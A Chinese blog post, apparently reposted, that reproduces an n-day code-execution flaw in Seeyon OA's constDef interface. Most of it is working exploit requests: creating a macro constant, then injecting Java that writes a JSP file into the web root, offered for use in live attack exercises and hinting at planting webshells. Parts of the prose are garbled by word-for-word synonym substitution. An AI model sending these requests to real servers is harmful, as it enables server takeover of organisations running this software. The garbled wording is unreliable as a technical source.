[漏洞复现]致远在野nday constDef接口存在代码实行漏洞

假如觉得该文章有帮助的，麻烦师傅们可以搜索下微信公众号：良月安全。点个关注，感谢师傅们的支持。
炒个冷饭，虽然是个23年hw爆出来的洞，但是网上没有公开利用的信息，而且在hw中共同致远的权限绕过也成功过几次，感觉能打的还是有一些的。

漏洞简介

致远OA是一款面向企业的办公自动化软件，设计理念是以人为中心，提供全面的协同办公办理方案。它由北京致远互联软件股份有限公司开发，自2002年成立以来，致力于提供协同办公产品的设计、研发、销售及服务。致远OA不仅支持根本的办公自动化功能，如‌流程审批、‌信息共享和‌文档处理，还提供了高级功能如‌移动办公和‌集成第三方系统，以适应差异规模企业的需求。攻击者可通过代码实行漏洞获取服务器权限。

漏洞复现

起首新建一个常量，constKey(常量名)为demo。

1. /seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4

复制代码

可以通过如下接口查看常量是否新建完成。

1. /seeyon/ajax.do?method=ajaxAction&managerName=constDefManager&rnd=123123123&managerMethod=listPage&arguments=%5B%7B%22page%22%3A1%2C%22size%22%3A20%7D%2C%7B%7D%5D

复制代码

再新建一个常量，constType值为4表示常量类型为宏替换，在constDefine(常量界说)中引用常量demo，构造闭合造成代码实行。

1. /seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCVvdXQucHJpbnRsbigiMjEzMjEzIik7JT4=%22)));%22&constDescription=123&constType=4

复制代码

大概要运行2次才气成功，写入1111.jsp文件。

漏洞复现就如许。假如师傅们在实战中利用过就会知道，常规的蚁剑、冰蝎等webshell管理工具的jsp马在写入的过程中由于太长而写不进去，这个问题就留给师傅们思考，我这边具体方法就放在星球。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。